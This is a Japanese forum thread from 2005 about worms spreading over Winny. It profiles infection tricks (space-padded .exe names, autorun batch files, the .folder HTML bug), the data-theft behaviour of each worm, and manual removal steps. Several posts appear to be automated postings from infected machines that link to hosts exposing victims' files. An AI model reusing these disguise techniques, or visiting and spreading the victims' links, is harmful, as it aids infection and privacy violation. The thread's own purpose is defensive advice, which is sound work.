Winnyを狙ったワーム・ニュイルス情報 Part39

このエントリーをはてなブックマークに追加
1[名無し]さん(bin+cue).rar
『山田はニュイルスではありません』
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行させる

■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。

前スレ
Winnyを狙ったワーム・ニュイルス情報 Part38
ttp://tmp5.2ch.net/test/read.cgi/download/1113652734/

Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
2[名無し]さん(bin+cue).rar:2005/05/07(土) 23:35:49 ID:iZV75mqX0
2get
肉じゃがさん(´・ω・) カワイソス
3[名無し]さん(bin+cue).rar:2005/05/07(土) 23:37:33 ID:IfrfpQlQO
4[名無し]さん(bin+cue).rar:2005/05/07(土) 23:37:39 ID:565LkDl00
http://tetkyo057214.tkyo.te.ftth2.ppp.infoweb.ne.jp/
おkwww
wwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwww

www
うはっwww

うぇwwwっうぇwwwwwwwwwwwwおkwww
5[名無し]さん(bin+cue).rar:2005/05/07(土) 23:37:54 ID:P0nkhrUs0
http://YahooBB221024240023.bbtec.net/
っうぇ

wwwwwwwwwwwwwwwうはっwww

wwwwwwwwwwwwwっwwwwwwっwww
wwwwwwwwwwwwwwwっうぇっおkwww
6[名無し]さん(bin+cue).rar:2005/05/07(土) 23:38:05 ID:rbBLf80l0
■感染しないための注意1 〜予めやっておくべき設定〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく。(詳しくは別記)
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 また怪しいと思ったらwhiterVBS簡易チェッカーで調べてみる。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
 にあるFlagsの値を10進数で1に変更する。
・アイコン偽装したexeを見分けるため、フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。
7[名無し]さん(bin+cue).rar:2005/05/07(土) 23:39:01 ID:rbBLf80l0
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・exeファイルの実行は完全自己責任、転んでも泣かない。
・ソフトを使って予め解凍する前に怪しい拡張子ファイルを削除する。
 ttp://a-t-software.hp.infoseek.co.jp/apps/delexe/index.html
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://winny.serveftp.com/nydb/top.php

※CD/DVDドライブのAutorunの切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
  2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
8[名無し]さん(bin+cue).rar:2005/05/07(土) 23:41:18 ID:rbBLf80l0
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」

■まとめサイト
 ttp://myui.s53.xrea.com/kin/index.html
■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
 ttp://www.geocities.jp/ichigo_kintama/
9[名無し]さん(bin+cue).rar:2005/05/07(土) 23:42:07 ID:rbBLf80l0
★流行種その2
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■主な症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 ※Systemフォルダにあるsvchost.exeは問題ありません。
・UpFolder.txtにBBSという名前でダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。
 親はms???.exe(282k)、子はms???.exe(248k)。
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■駆除方法
1.親のファイル名が含まれるレジストリキーを削除。
 Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
 (Win9x、MEの場合は不明)
2.セーフモードで再起動し、ファイルを親子ともども削除。
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4.NyのUpフォルダ設定を元に戻す。
5.ノートンやバスター等のワクチンソフトを再インストール。
 バスターはPCCTool.exeを使えば再インストールせずに済む。
10[名無し]さん(bin+cue).rar:2005/05/07(土) 23:42:45 ID:rbBLf80l0
★流行種その3
【Autorun+batを利用したウイルス】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■主な活動内容(種類により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動する毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。
・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。
■駆除方法(種類により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
11[名無し]さん(bin+cue).rar:2005/05/07(土) 23:43:19 ID:rbBLf80l0
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
■感染ルート
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。
■主な症状(感染確認方法)
・ny起動すると画面が真っ黒になり、
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャが起動できない。
■主な活動内容
・C:\WINNT\Web\Wallpaperのフォルダを開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか(3つ?)作る。
 ファイル名はシステムに使用されるものをランダムに使用する模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下の値も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■駆除方法
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで追加されたキーを削除。
12[名無し]さん(bin+cue).rar:2005/05/07(土) 23:43:52 ID:rbBLf80l0
★流行種その5
【仙台キンタマ(W32.SillyP2P)】
■感染ルート
・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。
■主な活動内容
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
 Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
 downフォルダ内のファイル一覧のtxt、デスクトップSS、
 Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。

【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。
・ノートンはAntinny.Gとして緊急対策。
13[名無し]さん(bin+cue).rar:2005/05/07(土) 23:44:28 ID:rbBLf80l0
【仁義なきキンタマ】
■感染ルート
・フォルダアイコンに偽装したサイズ829,440の「新しいフォルダ      .exe」を踏んで感染。
・感染者が流す、[仁義なきキンタマ] ○○のドキュメント.zipに偽装したウイルス本体が同梱されている。
・セキュリティレベルが低いと同梱されているhtmlから感染。
■主な症状(感染確認方法)
・C:\WINDOWS\system32\drivers\svchost.exe
 C:\WINDOWS\system32\wbem\     .exeを作成。
・C:\Documents and Settings\ユーザー名\Local Settings\Temp\jktemp\upにupフォルダ作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にsvchost.exeが登録される。
■主な活動内容
・デスクトップのスクリーンショットを取る。
・Winnyの検索履歴・tab1.txt・tab2.txt、WinMX共有ファイル名、2chブラウザのkakikomi.txt、IEのcookie、
 OEの受信・送信フォルダ、hotmail情報、ワード・エクセルのファイルをupフォルダに圧縮する。
・UpFolder.txtを書き換えて以下の形でwiinyにファイルを勝手にアップロードする。
 [仁義なきキンタマ] ○○のデスクトップ(******-****).jpg
 [仁義なきキンタマ] ○○のドキュメント.zip
■駆除方法
・C:\WINDOWS\system32\drivers\svchost.exe
 C:\WINDOWS\system32\wbem\     .exeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにある
 system32\drivers\svchost.exeを削除。
・UpFolder.txtの修正、作成されたupフォルダの削除。
■予防
・exe踏むなかれ。

まとめサイト
ttp://kintama.client.jp/
ttp://nemoba.seesaa.net/article/2479117.html
14[名無し]さん(bin+cue).rar:2005/05/07(土) 23:45:01 ID:rbBLf80l0
【欄検眼段】
■感染ルート
・アプリに混入させ感染させる。
■主な症状(感染確認方法)
・C:\WINDOWS\system32\IMJPMlG.exeを作成。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にIMJPMlG.exeが登録される。
・フォルダ「temp000」を作成。
・UpFolder.txtを作成し以下の内容を書き込み、アップロードさせる。
   [temp000]
   Path=C:\temp000
   Trip=12345
■主な活動内容
・OS起動時にデジカメ画像ファイル「DSC〜.JPG」を探し、「.GJB」に拡張子変更させアップロードする。
■駆除方法
・C:\WINDOWS\system32\IMJPMlG.exeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にIMJPMlG.exeを削除する。
・フォルダ「temp000」削除、UpFolder.txt修正。
15[名無し]さん(bin+cue).rar:2005/05/07(土) 23:51:22 ID:rbBLf80l0
【山田ウイルス&亜種】

流行中、でもスレ違い

ttp://127.0.0.1/
開けると感染中

感染するとデスクトップのスクリーンショットと、ハードディスクに保存されているファイル
全てを、外部からダウンロード出来るようにHTTPサーバーで公開します。そのアドレスを
2ちゃんねる内の掲示板にランダムに書き込みます。

他にも、ホストファイルを書き換えて、マイクロソフトやアンチウィルスソフト会社サイト
などへのアクセスを民主党(210.253.211.2)に変更し、ウィルス定義ファイルの更新、
ウィンドウズの更新などを利用出来ないようにします。

Q. なぜ山田?
A. 友人の山田くんがメッセで送ってきたyoujo.exeを踏んで感染したという書き込みから。
書き込みはネタだったけど、そのまま定着。

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MELLPON.A

まとめ
ttp://nemoba.seesaa.net/article/2891535.html
16[名無し]さん(bin+cue).rar:2005/05/07(土) 23:52:38 ID:rbBLf80l0
過去スレ1
Part1 ttp://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 ttp://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 ttp://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 ttp://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 ttp://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 ttp://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 ttp://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 ttp://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 ttp://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 ttp://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 ttp://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 ttp://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 ttp://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 ttp://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 ttp://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 ttp://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 ttp://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 ttp://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 ttp://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 ttp://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 ttp://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 ttp://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 ttp://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 ttp://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 ttp://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 ttp://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 ttp://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 ttp://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 ttp://tmp4.2ch.net/test/read.cgi/download/1099709559/
17[名無し]さん(bin+cue).rar:2005/05/07(土) 23:53:36 ID:rbBLf80l0
18[名無し]さん(bin+cue).rar:2005/05/08(日) 00:02:39 ID:6LnbQYqM0
>1
乙でス
19[名無し]さん(bin+cue).rar:2005/05/08(日) 00:08:19 ID:ReV0f/go0
【使用AntiVirusソフトでのウイルススキャンの結果】
【オンラインスキャンしたなら結果】
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp

ウイルススキャンにて感染の確認がない時は、質問用テンプレにて報告して下さい
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

■ニュイルス用質問テンプレ
【使用OS】
【WindowsUpdateしてるか】
【使用AntiVirusソフト】
【AntiVirusをUpdateしてるか】
【Winnyのバージョン】
【Winny歴、総DL量】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状、具体的に分かる限りすべて書く】
【何をしたらそんなことになったのか】
※感染元のファイルの情報もあると良し
【これまでにとった措置】
20[名無し]さん(bin+cue).rar:2005/05/08(日) 02:42:37 ID:D+fjBjHr0
【テンプレを読んだか】
モナーのつくりかたおしえてください
21[名無し]さん(bin+cue).rar:2005/05/08(日) 03:16:13 ID:3DSvyOBy0

 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
       ____.____    | .__    パソコンを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄
22[名無し]さん(bin+cue).rar:2005/05/08(日) 07:57:16 ID:qZ4Kd6wy0
>>通報屋
いつもご苦労様。

【参】考
http://www.a-chi.jp/_4_nen_Flash/4-077.swf
23[名無し]さん(bin+cue).rar:2005/05/08(日) 09:39:25 ID:zzu4CaER0
639 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2005/04/28(木) 21:06:25 ID:JJOZ54/90
>>637-638
PGPディスクかな?

ついでに>>1のテンプレの
http://www.geocities.jp/kemkzuenc/Antinny.html

http://wivir.tripod.com/Antinny.html
と変更しておいてね

あと久しぶりに更新したので
24[名無し]さん(bin+cue).rar:2005/05/08(日) 12:31:41 ID:zNdDMIVS0
山田て誰ですか?
25[名無し]さん(bin+cue).rar:2005/05/08(日) 12:32:22 ID:KZNGpJZ+0
http://JJ079055.ppp.dion.ne.jp/
wwwwwwwwうはっwwwおkwwwっっwwwwww

うはっwwwっうぇっwっwwwwwwwwwwww
wwwwwwwwwwwwっうぇwwwwwwwww
26[名無し]さん(bin+cue).rar:2005/05/08(日) 12:38:51 ID:zNdDMIVS0
>>25
山田さん?
27[名無し]さん(bin+cue).rar:2005/05/08(日) 12:44:34 ID:zNdDMIVS0
違うのか
28[名無し]さん(bin+cue).rar:2005/05/08(日) 13:57:14 ID:iMLjtx840
関連ニュース
ttp://www.sakigake.jp/servlet/SKNEWS.News.kiji?InputKIJICODE=20050502k
湯沢の漏えい職員、停職3ヶ月に
29[名無し]さん(bin+cue).rar:2005/05/08(日) 14:14:36 ID:5v0YRt0p0
流出元のパソコン本体を紛失したとかいう、開き直った対応してた
のは湯沢と違ったっけ? 最近多いから混同しちゃうよ。(´・ω・`)
30[名無し]さん(bin+cue).rar:2005/05/08(日) 15:33:19 ID:oic4AbpC0
さっきみすってよくわからんexeくりっくして
Documents and Setting\ユーザー名 フォルダの中に「デスクトップ.なんたら(拡張子わすれた)」ってファイルあったんだが。
アウト? 焦ってWinny消してそのデスクトップなんたらも消した
31[名無し]さん(bin+cue).rar:2005/05/08(日) 15:41:01 ID:oic4AbpC0
ごめん19読んでなかった
【使用OS】XP SP2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】ノートン2005
【AntiVirusをUpdateしてるか】してる
【Winnyのバージョン】2
【Winny歴、総DL量】1年
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】対策っていうか確答してない
【症状、具体的に分かる限りすべて書く】ノートンが常駐できない(もしかしてAntinny.ms?)
【何をしたらそんなことになったのか】50Mあるexe起動した
※感染元のファイルの情報もあると良し
【これまでにとった措置】Dcuments and Setting\ユーザー名にあった「デスクトップ.なんたら」削除。ノートンでスキャン(反応無し)。WINNY削除
32[名無し]さん(bin+cue).rar:2005/05/08(日) 15:50:13 ID:iMLjtx840
とりあえず、タスクマネージャで変なプロセスが走っていないか確認
スタートアップフォルダ内や、レジストリのrunを確認
システムルートのautoexec.batなども確認、そこらのbatファイルも要チェック

バスターと先生のオンラインチェックで確認
不安が残るならフォーマットして再インスコ

そして、このスレの目的を再確認し、情報(感染元の詳細)提供に努めること
33[名無し]さん(bin+cue).rar:2005/05/08(日) 19:18:01 ID:itU4eYn30
>>31
アウトかセーフか自分で分からないのなら
リカバリした方が安全だし安心
34[名無し]さん(bin+cue).rar:2005/05/09(月) 01:59:52 ID:seJhTPRI0
山田による書き込みをNGにする方法(NGEx対応jane専用)
↓の一行を正規表現で追加してください
(ttp://).*(うぇ|うは|おk|っww|wwっ).*(うぇ|うは|おk|っww|wwっ).
35[名無し]さん(bin+cue).rar:2005/05/09(月) 04:29:02 ID:787J2kE10
>>28
業務上必要なソフトとかうそぶいてなかった?
36[名無し]さん(bin+cue).rar:2005/05/09(月) 08:04:54 ID:jATURfPY0
>>35
京都府警じゃあるまいし。(w
37[名無し]さん(bin+cue).rar:2005/05/09(月) 09:00:54 ID:HG6ELVotO
フリーか何かでexe実行時に警告出してくれるソフトかなんかなかったっけ?
38[名無し]さん(bin+cue).rar:2005/05/09(月) 11:20:02 ID:kB/WKegM0
バスター月額版、なんかクオカード配布で全登録者に\500キャッシュバックの上、
業者に頼んで復旧してた場合は領収書ありで8.5k、無しでも1kまで負担するんだと。

うち、2シリアルだから最低3k毟れる予感 (・∀・)
39[名無し]さん(bin+cue).rar:2005/05/09(月) 13:52:04 ID:lMZl9Tht0
ITがらみで迷惑かけると\500/件ていうのは定着した感があるね。
nyで漏らした某自治体とかはなんもせんのだろうけど
40[名無し]さん(bin+cue).rar:2005/05/09(月) 16:02:55 ID:pW6ReeUv0
ウイルスの検体うpするのってまずい?アーカイブにパス付けてコメントで警告すれば問題ないかな?
41[名無し]さん(bin+cue).rar:2005/05/09(月) 16:04:23 ID:VKmHpBed0
>>37
ロシア製のSSMかと。
42[名無し]さん(bin+cue).rar:2005/05/09(月) 22:27:07 ID:3xpWuM+s0
43[名無し]さん(bin+cue).rar:2005/05/09(月) 22:32:28 ID:cdi2rArJ0
ウィルス対策ソフトを使わず、手動で削除する俺はコスト削減に貢献!w
44[名無し]さん(bin+cue).rar:2005/05/10(火) 00:31:25 ID:DkZWgcNj0
トム「日本人は自分のパソコンを壊されても500円で納得するらしい」
ジャック「なんだって!アメリカなら少なくとも5万ドルは固いぜ」
トム「それだけではない。自分からメーカーに送る手間を被っても喜んでやるらしい」
ジャック「マイガ!アンビリーブ」
トム「今度生まれ変わるときは、日本のソフトメーカーに就職したいね」
45[名無し]さん(bin+cue).rar:2005/05/10(火) 00:53:41 ID:bwdg2bad0
>>42
これいいじゃんか
46[名無し]さん(bin+cue).rar:2005/05/10(火) 01:24:42 ID:O1aKseA40
実質的な被害が無くても、バスター使ってただけで
\500のお小遣いが入ったって話じゃないかとw
47[名無し]さん(bin+cue).rar:2005/05/10(火) 01:39:53 ID:x91couLt0
つーかバスター>>>>>>>>>>ノートンだしなwwwwwwww
48[名無し]さん(bin+cue).rar:2005/05/10(火) 01:51:49 ID:SxMeYJYX0
さっきまで2ちゃんに繋がらなかったんだけど、何かあったん?
夕方から1時30分くらいまでまったく繋がらなかった…
49[名無し]さん(bin+cue).rar:2005/05/10(火) 01:53:15 ID:N+JPc9Dv0
キミだけ
50[名無し]さん(bin+cue).rar:2005/05/10(火) 03:13:29 ID:3LvolQ6W0
【欄検眼段】
これ、GBJのファイルを見ようとした(実行した)だけでは、感染はしないのですか?
51[名無し]さん(bin+cue).rar:2005/05/10(火) 04:38:30 ID:oren5mjU0
Winnyをはじめてからウィルスが恐くて夜も眠れません。
52[名無し]さん(bin+cue).rar:2005/05/10(火) 05:07:30 ID:6rpwZO+b0
昼寝すればいいじゃない
53[名無し]さん(bin+cue).rar:2005/05/10(火) 06:27:21 ID:clOvGT9z0
>>51
だったらnyやめて、窓からPCを投げ)ny
54[名無し]さん(bin+cue).rar:2005/05/10(火) 07:50:43 ID:Ynvmvv++0
>>50
A : _、_
 ( ,_ノ` )     n    こんな匿名掲示板で書かれたことを信用するんですか? だったら言ってあげますよ
 ̄    \   ( E)   罠満載!見た瞬間に個人情報撒くわ
フ  癌  /ヽ ヽ_//   専用UploaderにデスクトップのSS投稿するわ重要ファイルは消えるわ家は燃えるわ大騒ぎ!!pgr
55[名無し]さん(bin+cue).rar:2005/05/10(火) 11:18:20 ID:5H4XQms+0
山田ってなんですか?
56[名無し]さん(bin+cue).rar:2005/05/10(火) 11:19:59 ID:L+Ra/efo0
http://dhcp3037.orihime.ne.jp/
wwwwwwwwwwwwうはっwwwっ
うぇwww
wwwwwwwおkwwwうはっwwwwwwwwwwwwwwwwww
おkwwwおkwwwwうはっwww
57[名無し]さん(bin+cue).rar:2005/05/10(火) 11:22:29 ID:EYhKKf8X0
いいタイミングだな。
58[名無し]さん(bin+cue).rar:2005/05/10(火) 11:59:36 ID:Btdu7oMa0
タイミングどころかワザとageたんじゃない?
59[名無し]さん(bin+cue).rar:2005/05/10(火) 12:44:30 ID:ABE9BTMI0
orz
60[名無し]さん(bin+cue).rar:2005/05/10(火) 12:55:11 ID:zKp8aF/i0
【使用OS】 XP
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 未使用
【AntiVirusをUpdateしてるか】 未使用
【Winnyのバージョン】 2.0b71
【Winny歴、総DL量】 3年、恐らく数百G
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 していなかった。
【症状、具体的に分かる限りすべて書く】 ドキュメント内のファイルが全て(・ё・)xxxxx.jpegに置き換えられ、
                          Windowsを起動すると9xチックなウィンドウが際限なく開かれる。
【何をしたらそんなことになったのか】 らぶデス 〜Realtime Lovers〜 モザイク除去パッチ.zipのインストール版を踏んだ
※感染元のファイルの情報もあると良し
【これまでにとった措置】 Ctrl+Altを押すと取り合えず起動できた。ドキュメント内にはフラッシュしか入れてなかった為
                素直に諦めてjpegを全て消した。
61[名無し]さん(bin+cue).rar:2005/05/10(火) 13:35:01 ID:FgMiQqa90
>>60
OSも消した方がよろしいかと。
62[名無し]さん(bin+cue).rar:2005/05/10(火) 16:36:05 ID:PtntdVRx0
>>55
もはや一昔前のウイルス。
御三家(先生、マカ、バスター)はある程度の亜種まで対応済みだが
無料アンチウイルスユーザーなどでは現在も感染者が居る。
感染すると全世界にPC内のほぼ全ファイルを提供する状態となり、
2chに定期的にホストを書き込んで他人にアクセスを促し、
さらに↓のようにリアルタイムにデスクトップ画像を晒される。
ttp://with2ch.net/up/data/1115709592.jpg
63[名無し]さん(bin+cue).rar:2005/05/10(火) 16:36:27 ID:rJUsZ66+0
http://YahooBB221025002002.bbtec.net/
っうぇおkwwwwwwwww
wwwwwwっうぇっ
うぇwwwwっwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwww
64[名無し]さん(bin+cue).rar:2005/05/10(火) 16:36:45 ID:+ZCMBXHi0
http://62.net059086117.t-com.ne.jp/
